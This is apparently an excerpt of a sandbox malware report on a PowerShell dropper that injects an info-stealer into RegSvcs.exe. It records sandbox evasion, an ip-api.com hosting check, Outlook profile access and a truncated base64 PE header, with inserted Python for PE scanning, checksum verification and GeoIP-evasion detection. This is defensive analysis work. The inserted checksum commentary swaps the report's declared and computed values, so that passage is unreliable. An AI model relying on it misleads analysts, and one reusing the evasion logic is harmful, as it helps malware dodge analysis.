Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADCHpS/hn/67I
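The AMSI line above is the script handing a base64-encoded PE to FromBase64String: "TVqQ" decodes to the MZ signature, and further in the run sits the standard DOS stub text. The report truncates the blob, which is the normal situation for a triage analyst working from a log excerpt, so a scanner has to cope with a run cut off mid-quartet. The following scanner is an added example for this page, not part of the Joe Sandbox report or of the sample: it copies the recorded fragment verbatim, wraps it in a constructed PowerShell line (the report does not show the script body), pulls every long base64 run out of the text, decodes what is complete, and reports the DOS-header facts that can be read from a prefix, including whether the NT headers are even reachable.

```python
import base64
import re
import struct

# Base64 prefix that AMSI recorded for this sample, copied verbatim from the report (the report truncates it).
AMSI_FRAGMENT = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"
    "JAAAAAAAAADCHpS/hn/67I"
)

# Constructed dropper line: the report does not show the script body, only what AMSI saw.
SAMPLE_SCRIPT = '$b = [System.Convert]::FromBase64String("' + AMSI_FRAGMENT + '")'

# Constructed 68-byte image for the non-truncated case: e_lfanew = 0x40 points straight at "PE\0\0".
SYNTHETIC_MZ_PE = base64.b64encode(b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0").decode()

B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
DOS_STUB = b"This program cannot be run in DOS mode"


def decode_prefix(run: str) -> bytes:
    """Decode a base64 run that may be cut off mid-quartet by dropping the incomplete tail."""
    usable = len(run) - len(run) % 4
    return base64.b64decode(run[:usable]) if usable else b""


def inspect_pe_prefix(blob: bytes):
    """DOS-header facts for a (possibly truncated) PE image; None if the blob is not MZ."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    # The PE\0\0 signature can only be checked if the decoded bytes reach e_lfanew.
    signature = None
    if e_lfanew + 4 <= len(blob):
        signature = blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return {
        "mz": True,
        "e_lfanew": e_lfanew,
        "dos_stub": DOS_STUB in blob,
        "pe_signature": signature,   # None means truncated before the NT headers
        "decoded_len": len(blob),
    }


def scan_script(text: str):
    """Return DOS-header facts for every base64 run in the text that decodes to an MZ image."""
    hits = []
    for m in B64_RUN.finditer(text):
        info = inspect_pe_prefix(decode_prefix(m.group(0)))
        if info:
            hits.append(info)
    return hits


if __name__ == "__main__":
    for hit in scan_script(SAMPLE_SCRIPT):
        print(hit)
```

On the recorded fragment the scanner gets 135 bytes, an e_lfanew of 0xF8 and the DOS stub string, but cannot confirm the PE signature because the NT headers start past the truncation point; that distinction matters when deciding whether a log excerpt alone proves an embedded executable or only strongly suggests one. The caveat for production use is that droppers routinely split, reverse or re-encode the blob so that no single 64-character run survives; the regex here is a first pass, not a complete detector.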
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
Source: x.exe.3.dr | Static PE information: real checksum: 0xa961f should be: 0xf93a0
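The checksum line above says that x.exe's optional header declares 0xf93a0 while the bytes on disk sum to 0xa961f. The loader only enforces this field for drivers and boot-start images, so the mismatch does not stop the sample from running, but a nonzero value that no longer matches is a reliable sign the file was rewritten after the linker produced it (packed, patched or stub-wrapped). The routine below is an added example for this page, not the report's or the sandbox's code: it recomputes the CheckSum field the way imagehlp's MapFileAndCheckSum and pefile's generate_checksum do, on a constructed PE-shaped buffer, and classifies declared against computed. The one rule a practitioner must keep in mind is that a declared value of 0 means "never set", which is common for user-mode binaries and not suspicious on its own.

```python
import struct

CHECKSUM_FIELD_OFFSET = 0x58  # IMAGE_OPTIONAL_HEADER.CheckSum relative to "PE\0\0"; identical for PE32 and PE32+


def checksum_offset(data: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + CHECKSUM_FIELD_OFFSET


def pe_checksum(data: bytes) -> int:
    """Ones'-complement sum of the file as little-endian 16-bit words with end-around carry,
    skipping the 4-byte CheckSum field itself, plus the file length (the imagehlp algorithm)."""
    skip = checksum_offset(data)
    total = 0
    for off in range(0, len(data) & ~1, 2):
        if skip <= off < skip + 4:
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
    if len(data) & 1:                              # odd trailing byte counts as a low byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)


def read_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_offset(data))[0]


def set_checksum(data: bytes) -> bytes:
    """Return a copy with a correct CheckSum written into the optional header."""
    out = bytearray(data)
    struct.pack_into("<I", out, checksum_offset(data), pe_checksum(data))
    return bytes(out)


def classify(declared: int, computed: int) -> str:
    if declared == 0:
        return "unset"        # linker never wrote one; not a tamper signal by itself
    return "ok" if declared == computed else "mismatch"


def verify_checksum(data: bytes) -> dict:
    declared, computed = read_checksum(data), pe_checksum(data)
    return {"declared": declared, "computed": computed, "status": classify(declared, computed)}


def build_sample_pe() -> bytes:
    """Constructed 1 KiB PE32-shaped buffer: DOS header, PE signature, COFF header, optional header, filler."""
    img = bytearray(1024)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)        # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x84, 0x014C, 1)   # Machine = i386, NumberOfSections = 1
    struct.pack_into("<H", img, 0x98, 0x010B)       # optional header Magic = PE32
    for i in range(0x100, len(img)):               # deterministic pseudo-random "section" bytes
        img[i] = (i * 37 + 11) & 0xFF
    return bytes(img)


if __name__ == "__main__":
    pe = build_sample_pe()
    print(verify_checksum(pe))                     # status "unset": field is still zero
    print(verify_checksum(set_checksum(pe)))       # status "ok"
    print(classify(0xF93A0, 0xA961F))              # the report's numbers for x.exe: "mismatch"
```

Because the field is excluded from the sum, writing the checksum into the header does not change what the routine computes, which is what makes the check self-consistent; flipping any other byte does change it. Running this against the dropped x.exe would reproduce the report's 0xa961f.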
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFB4A930988 push E95AFAD0h; ret 3_2_00007FFB4A9309C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFB4A9300BD pushad ; iretd 3_2_00007FFB4A9300C1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00423149 push eax; ret 6_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004231C8 push eax; ret 6_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0040E21D push ecx; ret 6_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0570E3E0 pushfd ; retf 6_2_0570E3E1
Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'RFRXt6YaupeCN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (91 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (16 occurrences)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\x.exe API/Special instruction interceptor: Address: 2F33254
              Source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
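              The ip-api.com request above (GET /line/?fields=hosting) is the sample's data-centre check: the /line/ endpoint returns plain text, one value per requested field, so the injected process learns whether its public IP belongs to a hosting provider. The Python below is an added example, not part of the Joe Sandbox report or of the malware. It parses a captured request of that shape and classifies constructed proxy-log lines, flagging a non-browser process that asks a GeoIP service for hosting/proxy flags. The GeoIP hosts other than ip-api.com, the log-line layout, and the assumption that the stealer exits on a 'true' answer are mine, not from the report.

```python
"""Added example: it is not part of the Joe Sandbox report or of the sample.

The report shows the injected payload sending
    GET /line/?fields=hosting HTTP/1.1   Host: ip-api.com
ip-api.com's /line/ endpoint answers with one plain-text value per requested
field, so the process learns whether its public IP belongs to a hosting
provider. The helpers below parse a request of that shape and classify
proxy-log lines; the extra GeoIP hosts, the log-line layout and the idea that
the stealer exits on a 'true' answer are assumptions for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# ip-api.com is the host seen in this report; the others are assumed peers.
GEOIP_HOSTS = {"ip-api.com", "ipinfo.io", "ipapi.co"}
# Query fields whose only use for a stealer is deciding whether to run.
EVASION_FIELDS = {"hosting", "proxy", "mobile"}
INTERACTIVE_BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed log layout: "<timestamp> <process> <method> <url>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")


def parse_raw_request(raw: str) -> dict:
    """Split a captured request (request line + headers) into its parts."""
    lines = [ln for ln in raw.replace("\r\n", "\n").split("\n") if ln]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for hdr in lines[1:]:
        name, _, value = hdr.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "host": headers.get("host", "")}


def requested_fields(target: str) -> set:
    """Fields asked for via ?fields=a,b,c (ip-api.com style)."""
    fields = set()
    for raw in parse_qs(urlsplit(target).query).get("fields", []):
        fields.update(f.strip() for f in raw.split(","))
    return fields


def classify(proc: str, host: str, target: str) -> str:
    """'evasion': a non-browser process asks a GeoIP API for hosting/proxy flags."""
    if host.lower() not in GEOIP_HOSTS:
        return "benign"
    if requested_fields(target) & EVASION_FIELDS and proc.lower() not in INTERACTIVE_BROWSERS:
        return "evasion"
    return "geoip"


def scan_log(lines):
    """Classify each constructed proxy-log line; returns (ts, proc, verdict)."""
    results = []
    for ln in lines:
        m = LOG_RE.match(ln)
        if not m:
            continue
        host = urlsplit(m["url"]).hostname or ""
        results.append((m["ts"], m["proc"], classify(m["proc"], host, m["url"])))
    return results


def sample_would_exit(response_body: str) -> bool:
    """Assumed stealer logic: a 'true' hosting flag means a sandbox/VPS, so quit."""
    return response_body.strip().lower() == "true"


# Constructed sample log lines (not from the report's pcap).
SAMPLE_LOG = [
    "T+0.0s RegSvcs.exe GET http://ip-api.com/line/?fields=hosting",
    "T+2.1s chrome.exe GET https://ip-api.com/json/",
    "T+3.4s chrome.exe GET https://ipinfo.io/json?fields=hosting",
    "T+5.0s svchost.exe GET http://www.msftconnecttest.com/connecttest.txt",
]

if __name__ == "__main__":
    for ts, proc, verdict in scan_log(SAMPLE_LOG):
        print(f"{ts:8} {proc:14} {verdict}")
```

              The process name is what separates a stealer from a user visiting a GeoIP site in a browser; RegSvcs.exe, a .NET framework utility, has no reason to ask any service whether it runs on a hosted IP. Blocking the lookup at the proxy is also a cheap way to make the sample run on: with no answer it cannot prove it is in a data centre.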
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
